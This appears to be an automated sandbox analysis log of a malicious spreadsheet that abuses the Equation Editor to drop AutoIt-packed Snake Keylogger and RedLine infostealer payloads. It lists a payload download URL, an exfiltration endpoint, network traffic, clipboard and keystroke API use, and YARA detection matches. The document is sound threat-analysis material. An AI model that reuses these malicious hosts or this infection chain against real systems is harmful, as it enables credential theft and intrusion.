                  Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                  Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                  Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                  Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                  Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                  Source: RegSvcs.exe, 00000009.00000002.887723750.0000000002458000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                  Source: RegSvcs.exe, 00000009.00000002.887723750.000000000239A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                  Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                  Source: EQNEDT32.EXE, 00000002.00000003.526417075.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.526541779.00000000005B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://baitalasma.com/
                  Source: EQNEDT32.EXE, 00000002.00000002.526541779.000000000057F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526417075.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://baitalasma.com/T7643
                  Source: EQNEDT32.EXE, 00000002.00000002.526524695.000000000053F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.526541779.000000000057F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526417075.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://baitalasma.com/T76434567000.exe
                  Source: EQNEDT32.EXE, 00000002.00000002.526541779.000000000057F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526417075.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://baitalasma.com/T76434567000.exeate
                  Source: EQNEDT32.EXE, 00000002.00000002.526524695.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://baitalasma.com/T76434567000.exeqqC:
                  Source: EQNEDT32.EXE, 00000002.00000002.526524695.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://baitalasma.com/T76434567000.exe~x
                  Source: RegSvcs.exe, 00000009.00000002.887723750.0000000002479000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887723750.0000000002436000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002507000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000254A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: RegSvcs.exe, 00000009.00000002.887723750.0000000002436000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002507000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: RegSvcs.exe, 0000000C.00000002.887712847.000000000254A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/81.181.54.104
                  Source: RegSvcs.exe, 00000009.00000002.887723750.0000000002479000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000254A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/81.181.54.1044
                  Source: RegSvcs.exe, 00000009.00000002.887723750.000000000239A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887723750.00000000024C5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000259A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scratchdreams.tk
                  Source: RegSvcs.exe, 00000009.00000002.887723750.00000000024C5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000259A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scratchdreams.tk/_send_.php?TS
                  Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                  Source: unknownHTTPS traffic detected: 38.242.255.115:443 -> 192.168.2.22:49164 version: TLS 1.2
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B8EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,5_2_00B8EAFF
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B8ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_00B8ED6A
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_0106ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,8_2_0106ED6A
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_013AED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,11_2_013AED6A
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B8EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,5_2_00B8EAFF
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B7AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,5_2_00B7AA57
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_01089576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,8_2_01089576
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_013C9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,11_2_013C9576

                  System Summary

                  barindex
                  Source: sheet1.xml, type: SAMPLEMatched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
                  Source: 11.2.name.exe.560000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 8.2.name.exe.7d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000008.00000002.779270718.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0000000B.00000002.817043732.0000000000560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: Process Memory Space: RegSvcs.exe PID: 1304, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: RegSvcs.exe PID: 1304, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: Process Memory Space: RegSvcs.exe PID: 2160, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: RegSvcs.exe PID: 2160, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: EQNEDT32.EXE, 00000002.00000003.460812242.0000000007ECD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_dafd640f-6
                  Source: EQNEDT32.EXE, 00000002.00000003.460812242.0000000007ECD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_bd735227-d
                  Source: negrett.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: negrett.exe, 00000005.00000000.460870402.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_59ed402a-6
